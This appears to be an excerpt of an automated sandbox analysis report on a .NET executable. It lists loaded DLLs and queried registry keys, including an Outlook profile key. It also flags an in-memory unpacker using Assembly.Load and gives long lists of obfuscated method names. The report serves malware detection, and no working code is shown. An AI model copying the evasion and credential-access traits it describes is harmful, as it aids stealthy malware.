Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 3GrfjMY0pG.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 3GrfjMY0pG.exe

Static file information: File size 1054720 > 1048576

Source: 3GrfjMY0pG.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 3GrfjMY0pG.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.Windows.Forms.pdb source: 3GrfjMY0pG.exe, 00000000.00000002.1196994849.0000000006430000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbt source: 3GrfjMY0pG.exe, 00000000.00000002.1196994849.0000000006430000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Jmdv.pdbSHA2560y* source: 3GrfjMY0pG.exe
Source:	Binary string: Jmdv.pdb source: 3GrfjMY0pG.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, RYr6Dnb8cId14miXvc.cs	.Net Code: AFRHYjAf3S System.Reflection.Assembly.Load(byte[])
Source: 0.2.3GrfjMY0pG.exe.43d80a8.1.raw.unpack, RK.cs	.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, RYr6Dnb8cId14miXvc.cs	.Net Code: AFRHYjAf3S System.Reflection.Assembly.Load(byte[])
Source: 0.2.3GrfjMY0pG.exe.59c0000.6.raw.unpack, RK.cs	.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.3GrfjMY0pG.exe.4e21b78.5.raw.unpack, RYr6Dnb8cId14miXvc.cs	.Net Code: AFRHYjAf3S System.Reflection.Assembly.Load(byte[])
Source: 0.2.3GrfjMY0pG.exe.43b8088.3.raw.unpack, RK.cs	.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_01479C30 push esp; retf 017Bh	5_2_01479D55
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_0147891E pushad ; iretd	5_2_0147891F
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_01478DDF push esp; iretd	5_2_01478DE0
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_0147BDA5 pushfd ; ret	5_2_0147BDAA
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_01478C2F pushfd ; iretd	5_2_01478C30
Source: C:\Users\user\Desktop\3GrfjMY0pG.exe	Code function: 5_2_06C99241 push es; ret	5_2_06C99244

Source: 3GrfjMY0pG.exe

Static PE information: section name: .text entropy: 7.820818630540199

Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, Pr9NEjWPLjtjxwCTRTZ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KknGZhPssi', 'UUqGvFwZHs', 'rYfGyFb623', 'n93GIq1A72', 'KctGcolUX2', 'VhIGJ02qgT', 'DqLGfkaKFX'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, ynfd59DTnk0P8IUUim.cs	High entropy of concatenated method names: 'X54Y1pc0G', 'tpvx1UyH0', 'AAi4JAUkp', 'fTBVZCwOB', 'WLhCVe6sg', 'A3fAS4YOY', 'MCUCwF8TJJfk98HXEC', 'LEVML925EIxHh4reXj', 'DvAFghZ5F', 'erIGCqNrl'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, OVbtgef29TOIYVcr1P.cs	High entropy of concatenated method names: 'mVJQ2FTMXV', 'CYTQT4RvWv', 'ToString', 'BblQapbXma', 'ND0QRS4PXv', 'nLSQKZmwI3', 'yW5Qn9BraN', 'tIlQ6A3ALO', 'jRKQjlpIAb', 'QFhQbuDiuH'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, hJig8h0WZikgbJwFOu.cs	High entropy of concatenated method names: 'xKLq9VeKRx', 'XpMquqvlqY', 'qyjqO7FWKI', 'LyVqmnd4pe', 'oXEqMOdKMQ', 'kJyqgNjxu8', 'yJUqXSDqXK', 'ntfqB2QA3j', 'PUIq8KtUFh', 'iDmqLZmB21'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, kedsymiHwR9IZl9Rpl.cs	High entropy of concatenated method names: 'TGoqw7NdG7', 'CygqQjoru6', 'JpiqqqymZj', 'cuCq3o6JRy', 'zDvql3CPql', 'Ux4qrwHry7', 'Dispose', 'cLEFaAxyOF', 'lH5FR3uRiC', 'qp1FKDgAne'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, QMS5wJSpvkKerolDJ1.cs	High entropy of concatenated method names: 'PGVQNMjm8W', 'zDNQpmVnAi', 'xfjFPuRPgU', 'jPLFWkXv4O', 'QRXQZtTHuq', 'kt1Qv2jqci', 'TNeQyqPMvE', 'oBaQIUqFJJ', 'xenQc4FcQC', 'L1SQJsYKga'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, rtUpFMWDBEDy9V0EA9v.cs	High entropy of concatenated method names: 'ToString', 'mMh3kZlNEo', 'daQ3C02ZFW', 'UPN3AJO2nj', 'Sni39vN8Gn', 'egP3uvUdJC', 'RI53OPvJCI', 'utG3mNO2D4', 'QFXNFRWUPPhW8yi5Nea', 'od4TV4WH96xh1EIeVAK'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, QS84t6WHerZ6peZei3s.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MxWoqG79nY', 'pFUoGwsB4t', 'OcQo3x2LGL', 'tLsooO2OSU', 'tVmolNyx39', 'DrgosTm46X', 'HK6or54Jnn'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, oG17jiWWq4NBFriJ2sN.cs	High entropy of concatenated method names: 'IsOGpFnI4x', 'G22GzUyb7B', 'QYW3P5CgwI', 'QJh3WiTc30', 'q5h3DeNXqA', 'A3k37u005t', 'XFq3H4nyLM', 'gBs3toLdWq', 'ub53aUlVpX', 'UHO3R1t6kI'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, iCyBrjAQ0K85ZxmtDg.cs	High entropy of concatenated method names: 'wCpndiiBJ4', 'N4unViW4AK', 'y96KOoCbOs', 'CO9KmUR7cl', 'ME1KMqZnZ4', 'YclKgGhLLU', 'UbcKXrh8dH', 'vNuKBjdKEa', 'MU0K8avwpJ', 'aQ9KLCPQpX'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, dynp2dHAyXLHRUbXBm.cs	High entropy of concatenated method names: 'NlXWjnVnXi', 'x7pWbD1OyD', 'E6YW25jjqc', 'jxvWTG6CyB', 'AmtWwDgTAV', 'hg6W1YPviX', 'LrJO9qUhSMlf9uojpL', 'RWbL0vH3Rjcc24eaNR', 'zxqWWAwbno', 'QlUW7uPPkx'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, CiqvKlplBI3tKjcx8Y.cs	High entropy of concatenated method names: 'hKHGKFanLs', 'xuRGnTxm4O', 'EATG6bCknV', 'lFNGj06W8d', 'HLtGqhCBgp', 'ETaGbsDlmS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, RYr6Dnb8cId14miXvc.cs	High entropy of concatenated method names: 'yDK7tqICGy', 'MZy7afHjIe', 'KQB7RKHOLZ', 'FRu7KnRmTZ', 'xfy7njfXsi', 'JLc76mtbCi', 'jwC7jen05i', 'JqN7beNc4P', 'raD75MWCph', 'QZX72IgiBW'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, mgDE1gRRmkiAifKFan.cs	High entropy of concatenated method names: 'Dispose', 'g9IW0Zl9Rp', 'HnCDuuhGpF', 'BOYXJTntj5', 'u54Wp0vphN', 'cV9WzHHht1', 'ProcessDialogKey', 'P5KDPJig8h', 'bZiDWkgbJw', 'rOuDD4iqvK'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, bPA6G0Kn1bOXlAplBO.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'z9sD0KHo5P', 'WsqDpo5BcS', 'LaRDzYIcHL', 'NV87PCoist', 'JN47WO1yv6', 'JRc7DoFQLW', 'NtO77kZOnS', 'ThnTqdLwZlGKdnoIuXR'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, LuU7TjJm9sXp1wJX8A.cs	High entropy of concatenated method names: 'ToString', 'y6l1ZqN899', 'wxl1u15tbT', 'Itf1OGuUSf', 'XBu1mfFo1K', 'Qlk1Mp6NEW', 'P8n1gqhXhq', 'tjJ1X5ZHth', 'vjN1BeHSgS', 'Y0G18CNvst'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, xBHHG6XsKDbNNLtgdy.cs	High entropy of concatenated method names: 'IY9jatkoX3', 'odJjKWW5Lg', 'jV5j6e1cCI', 'Q2S6pgEb9y', 'jbZ6zjmY6Z', 'CfrjPtiW6R', 'EZ6jWxn3NX', 'yDsjD7LEC6', 'IS2j7QStgF', 'XjCjHRYnqu'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, LnVnXikr7pD1OyDJ5H.cs	High entropy of concatenated method names: 'ON4RInxt91', 'jJsRc0nkMb', 'ApwRJ39qfS', 'U5eRf5PSQV', 'PFPReOlp6S', 'hdIRSyE7rh', 'hYDRi0iLUy', 'F8YRNMGitG', 'xG3R0DKa43', 'u8wRpysyKE'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, tsKFQRyS8x1tRqYrqR.cs	High entropy of concatenated method names: 'p7sEkerBwW', 'I19EC4ZAkx', 'hOSE9falXf', 'rZyEuOvAyx', 'c8XEmIQILl', 'Fm1EM1kOKf', 'SfTEX4N8xn', 'VPUEB5EYtN', 'wTCELe0IkX', 'h7LEZCOBCV'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, Rnlu3s8n8UKbY8UFJb.cs	High entropy of concatenated method names: 'pB2jh9voWO', 'hQejUt8O5j', 'eyfjYSEPGv', 's3hjxGwwZl', 'WK9jd1eB6H', 'eZXj4833YJ', 'pYHjVIj5Ht', 'JBIjk1bAGd', 'YJJjCNqWrc', 'AfCjAf9prE'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, uvatpAIBg4sIxQSbeU.cs	High entropy of concatenated method names: 'YLmwL6nIF1', 'ThgwvYmiVE', 'DCewII4v9O', 'S6swcgD2wI', 'J66wugNMXv', 'GnvwOnh33g', 'tRZwmuRfoD', 'otVwMNrqDw', 'u7hwg5sWGy', 'rZswXW1jZ2'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, geRufZzvwFwWKwr4Qj.cs	High entropy of concatenated method names: 'UUVG4t1bQd', 'hgDGkSgDwM', 'XXuGCiw1gc', 'kayG95e0ma', 'AOKGuglo1H', 'CddGm7oGc1', 'r5MGM2UIDL', 'ncdGrcR66p', 'QvRGhM6e39', 'ocaGUfcWtl'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, XBqFKCC6Y5jjqc6xvG.cs	High entropy of concatenated method names: 'RmVKxAprnF', 'XdJK4Cf7jp', 'tGqKktiP7i', 'XMMKClaRQn', 'rU0Kw8Fe46', 'gK5K1t02Cr', 'mp8KQnVkT9', 'oCYKFJbdgi', 'iK4KqrrSMZ', 'v74KGNwL83'
Source: 0.2.3GrfjMY0pG.exe.30d0000.0.raw.unpack, nAVng69YPviXSp80Uh.cs	High entropy of concatenated method names: 'ILq6tWNH5v', 'JOu6RNiwBx', 'UqE6nomfis', 'qWr6jYLjao', 'jpF6b5lHHR', 'p27ne7RSUc', 'H9NnSgLs63', 'HipniOUEvZ', 'lAgnNDsbSH', 'dCUn0ULXuu'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, Pr9NEjWPLjtjxwCTRTZ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KknGZhPssi', 'UUqGvFwZHs', 'rYfGyFb623', 'n93GIq1A72', 'KctGcolUX2', 'VhIGJ02qgT', 'DqLGfkaKFX'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, ynfd59DTnk0P8IUUim.cs	High entropy of concatenated method names: 'X54Y1pc0G', 'tpvx1UyH0', 'AAi4JAUkp', 'fTBVZCwOB', 'WLhCVe6sg', 'A3fAS4YOY', 'MCUCwF8TJJfk98HXEC', 'LEVML925EIxHh4reXj', 'DvAFghZ5F', 'erIGCqNrl'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, OVbtgef29TOIYVcr1P.cs	High entropy of concatenated method names: 'mVJQ2FTMXV', 'CYTQT4RvWv', 'ToString', 'BblQapbXma', 'ND0QRS4PXv', 'nLSQKZmwI3', 'yW5Qn9BraN', 'tIlQ6A3ALO', 'jRKQjlpIAb', 'QFhQbuDiuH'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, hJig8h0WZikgbJwFOu.cs	High entropy of concatenated method names: 'xKLq9VeKRx', 'XpMquqvlqY', 'qyjqO7FWKI', 'LyVqmnd4pe', 'oXEqMOdKMQ', 'kJyqgNjxu8', 'yJUqXSDqXK', 'ntfqB2QA3j', 'PUIq8KtUFh', 'iDmqLZmB21'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, kedsymiHwR9IZl9Rpl.cs	High entropy of concatenated method names: 'TGoqw7NdG7', 'CygqQjoru6', 'JpiqqqymZj', 'cuCq3o6JRy', 'zDvql3CPql', 'Ux4qrwHry7', 'Dispose', 'cLEFaAxyOF', 'lH5FR3uRiC', 'qp1FKDgAne'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, QMS5wJSpvkKerolDJ1.cs	High entropy of concatenated method names: 'PGVQNMjm8W', 'zDNQpmVnAi', 'xfjFPuRPgU', 'jPLFWkXv4O', 'QRXQZtTHuq', 'kt1Qv2jqci', 'TNeQyqPMvE', 'oBaQIUqFJJ', 'xenQc4FcQC', 'L1SQJsYKga'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, rtUpFMWDBEDy9V0EA9v.cs	High entropy of concatenated method names: 'ToString', 'mMh3kZlNEo', 'daQ3C02ZFW', 'UPN3AJO2nj', 'Sni39vN8Gn', 'egP3uvUdJC', 'RI53OPvJCI', 'utG3mNO2D4', 'QFXNFRWUPPhW8yi5Nea', 'od4TV4WH96xh1EIeVAK'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, QS84t6WHerZ6peZei3s.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MxWoqG79nY', 'pFUoGwsB4t', 'OcQo3x2LGL', 'tLsooO2OSU', 'tVmolNyx39', 'DrgosTm46X', 'HK6or54Jnn'
Source: 0.2.3GrfjMY0pG.exe.4ea8f98.2.raw.unpack, oG17jiWWq4NBFriJ2sN.cs	High entropy of concatenated method names: 'IsOGpFnI4x', 'G22GzUyb7B', 'QYW3P5CgwI', 'QJh3WiTc30', 'q5h3DeNXqA', 'A3k37u005t', 'XFq3H4nyLM', 'gBs3toLdWq', 'ub53aUlVpX', 'UHO3R1t6kI'
